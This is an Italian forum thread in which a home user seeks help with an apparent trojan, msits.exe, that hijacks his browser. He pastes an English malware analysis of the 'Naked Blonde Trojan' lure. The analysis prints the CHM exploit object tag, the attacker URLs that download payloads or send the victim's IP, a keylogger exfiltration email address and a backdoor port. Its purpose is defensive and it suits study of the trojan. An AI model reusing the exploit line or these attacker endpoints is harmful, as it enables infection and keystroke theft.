WINEXPLOR e MSITS

[Jarno]

si trovano dentro c:\WINDOWS\SYSTEM32
e si avviano automaticamente, Msits.exe ("Mysoft") all'avvio di windows, Winexplor.exe non ho capito quando e come si avvia

su Google non c'è niente

li ho trovati improvvisamente nel Task di Windows98SE
quando mi sono insospettito per 2 cose:
1) le risorse del sistema esaurivano in un attimo
2) richiamando un sito con Explorer mi apre al suo posto un sito porno; ma la cosa strane è che:
- nelle opzioni come pagina iniziale predefinita c'è "blank"
- una volta aperta questo sito si perde il controllo del browser
- sono mediamente "esperto" dei tranelli su internet ...ma non credo di aver fatto assolutamente niente di pericoloso ultimamente
- il firewall (Outpost) non rileva nulla

roba da moccoli ..ma tecnicamente notevole :quipy:

il probleme è: che faccio? basta cancellare gli exe e toglierli dall'esecuzione automatica? basta questo?

[Jarno]

sembra che solo un sito ne parli:

http://spamwatch.codefish.net.au/mod...rder=0&thold=0

fa un'analisi precisa di tutto ciò che succede sul PC ...roba dell'altro mondo ...non c'è modo per evitarlo o accorgersene.
Ma non dice cosa si deve fare noi

il nome sembra interessante:
"The Naked Blonde Trojan"
...ma non ho idea da dove sbuchi :quipy:
...almeno fosse coerente col nome, cioè, almeno mi facesse vedere un po' di biondine :quipy:

[makuro]

Originariamente inviato da Jarno
fa un'analisi precisa di tutto ciò che succede sul PC ...roba dell'altro mondo ...non c'è modo per evitarlo o accorgersene.
Ma non dice cosa si deve fare noi

Ciao,
ora non posso seguire il link su internet, ma cosa significa che non c'è modo per evitarlo o per accorgersene? Puoi postare la descrizione fatta dal sito se non è troppo lunga?

Saluti,
Roberto

[Jarno]

non sono un super tecnico, ma mi sembra di capire che per entrare in questo casino basta leggere una normale pagina :di56:

io infatti non ho mai aperto allegati, installato niente dal browser o eseguito qualche EXE strano



________________________
Type: Trojan (lures you to a website to be infected by a trojan)
Domain(s)/IP Address(es) used: 210.73.87.129 (Chinese Network)
Exact Link: http://210.73.87.129:4903/i/index.htm
Email's Originating Network(s): Multiple
Danger Level: Medium

Description

Yet another trojan site using the Microsoft Window CHM exploit. What's interesting aboout this one is the lure. We got two slightly differenet copies of the email to one of our inboxes in quick succession. A quick glance at them put them down to just general spam but something about them didn't seem quite right. We decided to look further into it and were rewarded with a trojan site. The email looks like this:

Greetings, probably you have already forgot me. We spend a nice time together last summer in Miami. Im Nataly, a blonde to whom you have confessed in love in the seacoast. It is a pity, that you have never called, but at last I managed to scan the photos you have been asking for (where Im naked). I hope they will help you to recover the memories and to call me.

it's my site

Valery

The name ending name changes at random but the message stays the same. What's weird about it is we don't expect a lot of people would follow the link. Most would just regard the email as spam and delete it. We suppose that a small amount may think it's a an email gone astray to them and follow the link out of curosity but we can't see the lure being all that popular.

The email is simple HTML and contains some extra text that's been set to white so that it doesn't display. This text is just random phrases designed to help the email bypass spam filters. Some examples of the random phrases:

be careful MIRC in 1820
in 1996 to go there in 1870
in 1887 Keep well! Movies smart

The rest of the email is basically just plain text. The bit that says "it's my site" is linked and goes to:

http://210.73.87.129:4903/i/index.htm

It was the fact the URL linked to a web server using an unusual port (4903 instead of port 80) that indicated that this email might be more sinister than your usual spam. We normally only see strange ports being used in phishing attempts or trojan sites. In this case a trojan site. We had a look at the linked site and found a web page that read:

Please wait ~1 minute
downloading...

In big bright red letters. The page doesn't load anything else that is visible to the end user who will probably just disregard the site or maybe catch on that's somethings not right. Something wasn't right. At the top of this web page is a line that reads:

object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://<IP address>:4903//i//main.chm::/main.htm"type="text/x-scriptlet"

(This line may trigger your anti-virus into stating this page is "infected". It's not and the way the text is displayed here it can not execute the exploit)

This exploit is of course the now very popular with trojan writers CHM exploit in the Microsoft Windows system (link goes to MS patch page). What it basically does is use the contents of "main.chm" to download and execute rogue code on the system.

To find out what exactly it did we fired up our victim Windows 2000 machine with it's various tools and networking monitoring and preceeded to open the page in Internet Explorer. The infection happens fairly fast. The page opens without thus and very quicky just by watching the traffic from the victim machine it becomes obvious that something is doing a lot of work on the machine. The machines CPU quikcly hit 100% use and sat there. It appears something had gone wrong with the trojan and some processes it had spawned were consuming the resources of the machine. After killing of these processes we went over the logs of our forensics tools to try and follow the events of what had happened.

First half went as expect. The page opened and the CHM exploit executed in our unpatched Internet Explorer 6 window. This caused the machines to download the executable file at:

http://210.73.87.129:4903/i/msits.exe

This was written to a random file name on the machine and executed. This in turn created two new files:



suchost.exe

durta32.dll


Both of these files were created in the main Windows directory (C:\WINNT on our 2000 machine). Once this was done the randomly named intial file was deleted from the system and "suchost.exe" is then executed. This is when the acitivy on the infected machine really kicks off.

There was a flurry of network activity and file creation. The program "suchost.exe" began writing out information to a file called "sini.ini". Shortly after this was when the machine CPU hit 100% usage and the victim machine almost became useless. No apparent explanation for that while were at this point so we killed off the trojan process and had a look at the network logs and files that had been created. First a look at the files:

msits.exe

Seems to be a compressed file containing what will be both "suchost.exe" and "durta32.dll". According to what we can see this file is apparently compressed with UPX (common file packer) but when we tried to unpack it with our usual UPX unpacker it didn't seem able to do it as the file may have been modified. We'll be looking for new ways to unpack this file, As such the strings output of this file is giving us limited information.

durta32.dll

This file was not packed and showed clearly that it played a part in hooking directly into the keyboard and mouse sub systems of windows allowing any program using this DLL (Dynamic Link Library) to capture all keystrokes on the sytem.

suchost.exe

Ah jackpot. This file was also unpacked and the strings ouput of this revealed a lot of information. It also matched the information we were finding in our network logs. Once launched this program attempts to download the following executables:

http://ash.phpwebhosting.com/~lksdfsdfeww/taskmng.exe
http://ash.phpwebhosting.com/~hgjhgjhasd/svhost.exe
http://ash.phpwebhosting.com/~ewksfdp/mstss.exe

PHPWebHosting.com is a cheap web hosting company who have been around a while so it's certain they are not involved in the trojan code. It appears that the trojaner may have comprimised an account on the hoster to place their files there. Not that it helps as a request for any of those files end in 404 (file not found). Bear this in mind as it appears to be the source of problems for the trojan later down the track.

It then makes a request like so:

]http://ash.phpwebhosting.com/~ydfkjfdbw/command.php?IP=<IP Address of Infected Machine>&

So in our victim machines case it sends:

http://ash.phpwebhosting.com/~ydfkjf...IP=10.0.0.197&

This does work as command.php does exist on the remote system. This responds with the sent IP address and a time date stamp. This is probably a method to inform the trojaners where in cyber space the infected machine is and when it was infected.

This is when the trojan hits trouble. When we looked at the machine we found that "suchost.exe" had spawned several copies of "NTVDM.EXE" which were consuming the machines entire resources. After doing some search we found that "NTVDM.EXE" is a legitmate part of windows and is a 16 bit virtual machine used to execute code of certain sorts. What we think is happening is that "suchost.exe" component has no error checking to deal with the fact that the files it wants to download aren't there. Because the hosters 404 system redirects to a generic 404 page and doesn't return a 404 error code the trojan downloads the HTML of the 404 page to the executable name it wants to run which attempts to get run by "NTVDM.EXE". Because HTML is not valid machine code this seems to throw the system right out as it trys to deal with it. We don't have any evidence that this is what happens but considering that all three files requested give 404's and that three instances of NTVDM.EXE are spawned it does make some sense.

After killing off the rogue NTVDM.EXE instances we were able to free the machine up enough to see what else was happening. Our forensics tools showed that it was constanly writing out to the "sini.ini" file in the main Windows directory. A quick look at the file revealed that it was a log file that was recording the title of the current active window and the time it was active. It also logged any keystrokes entered into the system.

In addation to this it also opened port 10002 to the world. This port was the same each time we ran the infection so we assume that it's hard coded. When we tried to telnet to the port we rewarded the following text:

C:\WINNT
C:\WINNT\System32

We didn't seem to be able to pass it any commands directly so it appears that it's probably a custom backdoor onto the system.

Since the trojan didn't seem to do much else after this point other than occasionally try to redownload the missed files and triggering the CPU consumation on the system again we killed it off and investigated the strings output in order to see if we could find out any more. What we found was three things.

First was that it should have attempted to create a file on the system called "surte.exe". We found that this file did exist in the system32 directory but wasn't binary at all buit contained the 404 HTML page which seemed to bear out our theory ot the trojan going astray and trying to execute non-executable code.

The second one was that the trojan looks like it was set up to email the keylogs back to an email address. It had it's own SMTP engine built in that was set to talk directly to the following IP address:

80.67.174.57

This is the mail server for the altern.org domain which appears to be a french domain that supplies free web mail accounts. It's not surprsing then that the email address the trojan is set to deliver it's payload to is:

poiuyyy@altern.org

By the looks of it the email delivers the current contents of the "sini.ini" to that address.

The third thing was that it also appeared to post some information to the script at:

http://ash.phpwebhosting.com/~ydfkjfdbw/post.php

This files does exist on the system and returns a blank page for anything we posted to it. We assume it stores information about the infected PC on the server.

Other than that we can only deduce that the trojan also insersts a registery entry into the system to ensure that it gets run a boot. It seems that without the rest of the files that it wants to download this trojan by itself is a non-targeted keylogger but in it's current state becomes highly detectable by the that that momements after infection the machines CPU level hits 100%.

The machine being used to host the intial viral site appears to be a compromised Window web/mail server in China. Several potential backdoors appear open on it as well as many ports well known to be exploitable.

Extra Information

Copy of the email

Second copy of the email

Port scan of server used to host intial viral site

Strings output of "msits.exe" - Apparently packed. No unpacked version as yet

Strings ouput of "durta32.dll" - No unpacking needed

Strings output of "suchost.exe" - No unpacking needed

Example of material logged in "sini.ini"

Screen shot showing the viral "loading" page

Screen shot showing "suchost.exe" running on the infected system - Also shows the three spawned "NTVDM.EXE" instances

Screen shot showing some more information of one of the "NTVDM.EXE" instances

Screen shot showing "suchost.exe" listening on port 10002

[makuro]

Mah, interessante come cosa... Sei sicuro c'entri qualcosa con il tuo problema? Comunque, riassumiamo alcune cose:
il troiano te lo becchi solo se segui il link sulla mail che ti porta sul sito cinese che a sua volta usa una vulnerabilità Microsoft per installare il programmino malevole.
Quindi se non segui il link ed hai installato le patch sei al sicuro.

Da quanto scritto, non funziona tutto a meraviglia ed alcune pagine da cui scaricare delle versioni di eseguibili sospetti non ci sono più...

Prova a vedere se il troiano è funzionante sulla tua macchina... telnet localhost 10002. Se risponde, la backdoor è in funzione.
Da quanto ho capito, vengono inviati dati sull'uso del pc.

Comunque se elimini l'eseguibile dalla partenza automatica, dovresti bloccare il troiano.

E patcha il sistema appena possibile...

Saluti,
Roberto

[amvinfe]

Questa volta ho modoficato io gli URLs in modo che non fossero cliccabili, la prossima volta che verranno postati nel forum indirizzi pericolosi (anche se questi portavano ad un Errore404 in quanto pagine rimosse), il 3d verrà chiuso o cancellato


Marco(amvinfe)